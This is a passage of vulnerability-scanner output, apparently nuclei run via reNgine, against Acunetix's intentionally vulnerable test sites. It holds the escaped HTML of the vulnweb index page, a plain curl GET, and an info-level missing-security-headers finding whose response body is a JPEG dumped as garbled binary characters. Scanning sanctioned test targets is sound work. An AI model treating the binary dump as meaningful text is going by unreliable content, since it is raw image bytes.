url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:28.579262678Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd 